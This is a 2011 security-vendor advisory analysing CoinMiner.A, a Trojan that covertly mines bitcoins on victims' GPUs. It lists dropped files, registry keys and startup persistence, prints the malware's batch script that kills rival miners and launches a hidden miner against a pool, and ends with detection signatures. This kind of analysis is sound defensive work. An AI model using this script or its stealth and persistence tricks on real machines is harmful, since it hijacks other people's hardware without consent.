New GPU Bitcoin Miner Trojan spotted in the wild

October 6, 2011

The Sonicwall UTM research team received reports of a new Bitcoin Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. The process of generating (mining) bitcoins is computationally expensive and would take an impractical amount of time to generate a single bitcoin on a personal computer. If however, a hacker were able to compromise a handful of machines with fast parallel Graphics Processing Units it could turn into a very lucrative money making business. CoinMiner.A is a Trojan that attempts to fulfill this purpose.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:Documents and Settings{USER}Local SettingsTempacc3kal.cmd
  • C:Documents and Settings{USER}Local SettingsTempacchsbca.exe
  • C:Documents and Settings{USER}Local SettingsTempaccmamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
  • C:Documents and Settings{USER}Start MenuProgramsStartupwuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]

hsbca.exe is non-malicious software from NTWind called Hidden Start. It is used to run batch files and other programs without a console window. It uses the following icon:

wuT2.exe uses the following icon:

3kal.cmd contains the following data:

      ping -n 40
      taskkill /f /im cgminer.exe
      taskkill /f /im svchoost.exe
      taskkill /f /im mamatije.exe
      taskkill /f /im mamatije2.exe
      taskkill /f /im mamatije3.exe
      taskkill /f /im yaaa3.2.exe
      taskkill /f /im WinMine.exe
      taskkill /f /im mamatije4.exe
      mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2

The Trojan adds the following keys to the Windows registry:

  • HKEY_CURRENT_USERSoftwareWinRAR SFX C:Documents and Settings{USER}Start MenuProgramsStartup "C:Documents and Settings{USER}Start MenuProgramsStartup"
  • HKEY_CURRENT_USERSoftwareWinRAR SFX C:Documents and Settings{USER}Local SettingsTempacc "C:Documents and Settings{USER}Local SettingsTempacc"

The Trojan attemps to open the following files:

  • C:Documents and Settings{USER}Start menuProgramsStartupstart.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartuphahahahaha.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartupwuT.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartupNoRisk.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartupNoRisk2.exe

The Trojan uses hsbca.exe (Hidden Start) to run "3kal.cmd" via the following command:

      C:Documents and Settings{USER}Local SettingsTempacchsbca.exe "/NOCONSOLE C:Documents and Settings{USER}Local SettingsTempacc3kal.cmd"

The Trojan runs the following command to ensure internet connectivity:

  • ping -n 40

As defined in "3kal.cmd" the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded:

  • cgminer.exe
  • svchoost.exe
  • mamatije.exe
  • mamatije2.exe
  • mamatije3.exe
  • yaaa3.2.exe
  • WinMine.exe
  • mamatije4.exe

Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CoinMiner.A (Trojan)
  • GAV: CoinMiner.A_2 (Trojan)
  • GAV: CoinMiner.A_3 (Trojan)